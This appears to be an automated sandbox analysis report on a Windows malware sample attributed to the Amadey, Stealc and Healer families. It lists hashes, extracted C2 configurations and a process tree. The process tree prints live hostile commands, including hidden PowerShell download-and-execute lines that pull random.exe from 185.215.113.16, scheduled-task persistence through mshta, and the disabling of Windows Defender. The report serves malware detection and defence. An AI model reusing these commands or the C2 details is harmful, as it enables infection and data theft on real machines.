Overview

overview

10

Static

static

3

141096063a...84.exe

windows7-x64

10

141096063a...84.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 10:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    141096063a6c104ca94037a3bcecca28e9b5179fe3b5cbafa646b88a145c4f84.exe

  • Size

    1.8MB

  • MD5

    e3cfc213f697b9ed0435f8052dfc0950

  • SHA1

    8755eb818d0c9dcb3fc0210207c64845e0e4f8f2

  • SHA256

    141096063a6c104ca94037a3bcecca28e9b5179fe3b5cbafa646b88a145c4f84

  • SHA512

    849e196510bdf4f265526fa75ba352deeaa4ecc3395054ef72e973579430c37aa24af798484226c143a4854f5c76ead73564866380a69adc5b3637ec6ae57fd1

  • SSDEEP

    49152:BMs7fUicQ3xMVwIpIhUI7Bspj68AQqypRo53:u6Uir36fpIpgA/

Score
10/10
amadeyhealerstealc9c9aa5fed3aarenodefense_evasiondiscoverydropperevasionexecutionpersistencestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\141096063a6c104ca94037a3bcecca28e9b5179fe3b5cbafa646b88a145c4f84.exe
    "C:\Users\Admin\AppData\Local\Temp\141096063a6c104ca94037a3bcecca28e9b5179fe3b5cbafa646b88a145c4f84.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1564
      • C:\Users\Admin\AppData\Local\Temp\1019816001\b060682385.exe
        "C:\Users\Admin\AppData\Local\Temp\1019816001\b060682385.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2148
      • C:\Users\Admin\AppData\Local\Temp\1019817001\2633ddb2fd.exe
        "C:\Users\Admin\AppData\Local\Temp\1019817001\2633ddb2fd.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4348
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1384
          • C:\Users\Admin\AppData\Local\Temp\1075142001\dd288340d2.exe
            "C:\Users\Admin\AppData\Local\Temp\1075142001\dd288340d2.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn hteoqmaMntI /tr "mshta C:\Users\Admin\AppData\Local\Temp\1mXZVS9gY.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1624
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn hteoqmaMntI /tr "mshta C:\Users\Admin\AppData\Local\Temp\1mXZVS9gY.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3996
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\1mXZVS9gY.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3EVFVYGQSS2ERA4SKJW5N3UABV6G9NMO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4716
                • C:\Users\Admin\AppData\Local\Temp3EVFVYGQSS2ERA4SKJW5N3UABV6G9NMO.EXE
                  "C:\Users\Admin\AppData\Local\Temp3EVFVYGQSS2ERA4SKJW5N3UABV6G9NMO.EXE"
                  8⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1232
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2888
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" any_word
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1280
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4416
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4888
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1872
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5060
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2384
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3596
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "ax4H8maQt7c" /tr "mshta \"C:\Temp\IJrTAsCUl.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2260
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\IJrTAsCUl.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1256
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1420
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:512
  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2924
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUEyNTZFOUUtMkIwOS00QzQ4LTlFOTgtNUJEQzE0OTlDRUJDfSIgdXNlcmlkPSJ7RDY5NUJERUYtRkUzRi00RDg4LUEwNzItOTA1OENGRjNEMTBFfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDlDOEVERUUtRTgzQy00RDYyLUFDNTctQ0E4ODFGMDVFQUYyfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDQ5MjgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxNzQzMjM4OTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0ODg0Mzk3OTA2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:3492
  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1872
  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3348
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

4
T1543

Windows Service

4
T1543.003

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

4
T1543

Windows Service

4
T1543.003

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Impair Defenses

5
T1562

Disable or Modify Tools

5
T1562.001

Modify Registry

6
T1112

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Discovery

Query Registry

4
T1012

System Information Discovery

3
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

System Network Configuration Discovery

1
T1016

Internet Connection Discovery

1
T1016.001

Virtualization/Sandbox Evasion

2
T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Temp\IJrTAsCUl.hta
    Filesize

    782B

    MD5

    16d76e35baeb05bc069a12dce9da83f9

    SHA1

    f419fd74265369666595c7ce7823ef75b40b2768

    SHA256

    456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

    SHA512

    4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    bdb4365930542d9c2974bf1a65bfe9b5

    SHA1

    2e3895e155e2bece1cd14b9a76d0c427355f97ed

    SHA256

    3acce55ac74eba91e445060fb60f200e240fd0a369fa806bddca7e974eb8022d

    SHA512

    fa3f7085fdd882860f04f376af34fc088c7ab3da91fcac0aa810e38aa19fffb09ce449f6d6d6d404e8bd157132201dc2267f2cabbd55996bec099dbc728950c8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    6e9dcb555931b1f1e1bc7fcca2decf42

    SHA1

    d1d402d3595583616084ae00f34fba6a0a5ebd05

    SHA256

    f968c098585b0344cd6b0dac07fbdd21112891e2fcc851cddba4e3b09d0ab886

    SHA512

    15289974e039f723153957c04f65f836eb60dc14c3e198bce40b92cf74fe1dc8bfd3399b99caaf544bb38574dc1f822977024dc9e43079c3ed043b15673cf78b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    df37897d1e52c6beb88534bb939dc2ad

    SHA1

    fc6ca8f1db6074ad89c368025ea4d70f26d4a3a9

    SHA256

    7165259a1fa158c56d6a4b224d65bbedaf500b55edcdbd0cbfc80ff5c8365bf8

    SHA512

    84d2d1b5f6f45849aed1d658022808a10d96d2ea21cf6cef197f27f52023a6a2553d5da19f7f5d4fb80c86261214282670afb7c86363bfab5ed49e898ee958aa

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    bb04bacdccf79cf3d02e94cc25ab713f

    SHA1

    66534d66180112d60de00240514ec7af3c752f3d

    SHA256

    38de4d9a154992fb16b8ca443c10bd4c711604bce4edf97c67633c6dbbc1ce80

    SHA512

    ee2d19f1f766056872138cea744bedf5dbf959a0ccfbf2b756721c3e1b7dbac3d5ee4fae2e6015a93df297fd37340162a64e0fe096c5f5fed4f836ced4727cad

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp3EVFVYGQSS2ERA4SKJW5N3UABV6G9NMO.EXE
    Filesize

    1.6MB

    MD5

    609af7625d11ab0500458958b360cd8d

    SHA1

    c2aaf3045b3e0373e73ae15d6d60b3e41448ec3a

    SHA256

    ad510fea7cea0c411318377af5a9ab8a7b583b2e7a161859ff9ff83470226b1a

    SHA512

    ffb3c47396166e767fa367d21ac94a71d6a6c37a346e0fa4aee5b20d7bd6bc949d9e50afdfd66d83e2f7e805b1a7ebfebb84bfdb623e32710bb62b58e0ca06ce

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1019816001\b060682385.exe
    Filesize

    1.7MB

    MD5

    40890fdfe7ed373b4f6197d3f6734316

    SHA1

    6acceb06f2a396d104909ed2d74bd180bc8f75dc

    SHA256

    0cbcd1bb0f8625af31fc63ae45ef2299c03041eec861cb85fb84da4182313dc2

    SHA512

    7de612f70d12befca3f97363e34f76669551182cf4bdca3136493121e1bf36b1bcb41d41ea7af9e42d3da4b90455bbdfde8e45363df5dd99f5f51779f7407a54

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1019817001\2633ddb2fd.exe
    Filesize

    2.1MB

    MD5

    581073aad7a20307a9d8b1ae25591204

    SHA1

    7a480497dcbf5a778a67a570507296190879d231

    SHA256

    10f74f3eb9a3efa714be7afa4503c6655f6502d3891497b96ce4418e0017f0f9

    SHA512

    0c9fee13c7723ba09449cbec55b88898ece66a53481250d84bd137cf8c972f5a2b3755bedf428595c43077d62fc3377626ee266c432988751f1f056c924d62ab

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1019818001\1ffdb6b104.exe
    Filesize

    448KB

    MD5

    43cecdd181555df52684e92b865011ae

    SHA1

    1015624dccdb7bc811d497182c22b45e6b0d3b47

    SHA256

    3ca203841ca2d571abad6889226ef4de1017b62426f7e0a1d5f50469d681a512

    SHA512

    8d13c361dac46450894d86d1dd614f650cb291e4b9fb4ab6369190a6e83b46706049fec5e0b57e110e0db89110031ea5811206daf9a81ea534325c6f497282a3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1075142001\dd288340d2.exe
    Filesize

    938KB

    MD5

    2a0ba19a154aebdeda1f99ec8851ac2c

    SHA1

    82bc9c7f3e9f855d9a16b3c536a20c4c51367e62

    SHA256

    d7addea06294f6f709db4d1e719c2bd65918ebe6d90202dd96c59f52b0cbdc00

    SHA512

    a16e3fcdd6c012101621d03c8793a4700f52acdaafef1622ac9fb9e64b13f552f07e4f25c7db0f2f253f1569a0881c1d1b55d211887f8ced8e1b401ec5661045

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd
    Filesize

    2KB

    MD5

    189e4eefd73896e80f64b8ef8f73fef0

    SHA1

    efab18a8e2a33593049775958b05b95b0bb7d8e4

    SHA256

    598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

    SHA512

    be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1mXZVS9gY.hta
    Filesize

    726B

    MD5

    0f9474b58ca8c429b4a8cfd9c16bc162

    SHA1

    9cf98d3f26169b191f515b0b8c80ae16ff8212f4

    SHA256

    70ef7b53ace505b1fdb9500b7d36de1cdc660cc7998a0a4b92a4bf4eb9ac6d7a

    SHA512

    e5da629858879edd0682b969b9e13b7fc59416c5000926f8d254043b40895632163bf637a7ec5c32c4a0be4b4e6e15612285ab82fd99e4ecfb3be10bd1207586

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    Filesize

    1.8MB

    MD5

    e3cfc213f697b9ed0435f8052dfc0950

    SHA1

    8755eb818d0c9dcb3fc0210207c64845e0e4f8f2

    SHA256

    141096063a6c104ca94037a3bcecca28e9b5179fe3b5cbafa646b88a145c4f84

    SHA512

    849e196510bdf4f265526fa75ba352deeaa4ecc3395054ef72e973579430c37aa24af798484226c143a4854f5c76ead73564866380a69adc5b3637ec6ae57fd1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5v5u20g.5fp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/512-222-0x00000000007F0000-0x0000000000CDE000-memory.dmp

    Filesize

    4.9MB

    Download

  • memory/512-219-0x00000000007F0000-0x0000000000CDE000-memory.dmp

    Filesize

    4.9MB

    Download

  • memory/768-15-0x0000000000DD0000-0x000000000128F000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/768-5-0x0000000000DD0000-0x000000000128F000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/768-0-0x0000000000DD0000-0x000000000128F000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/768-1-0x00000000775E4000-0x00000000775E6000-memory.dmp

    Filesize

    8KB

    Download

  • memory/768-2-0x0000000000DD1000-0x0000000000DFF000-memory.dmp

    Filesize

    184KB

    Download

  • memory/768-3-0x0000000000DD0000-0x000000000128F000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/1232-207-0x0000000000170000-0x00000000005AE000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/1232-228-0x0000000000170000-0x00000000005AE000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/1232-208-0x0000000000170000-0x00000000005AE000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/1232-209-0x0000000000170000-0x00000000005AE000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/1232-224-0x0000000000170000-0x00000000005AE000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/1384-243-0x0000000000250000-0x000000000073E000-memory.dmp

    Filesize

    4.9MB

    Download

  • memory/1384-92-0x0000000000250000-0x000000000073E000-memory.dmp

    Filesize

    4.9MB

    Download

  • memory/1384-91-0x0000000000250000-0x000000000073E000-memory.dmp

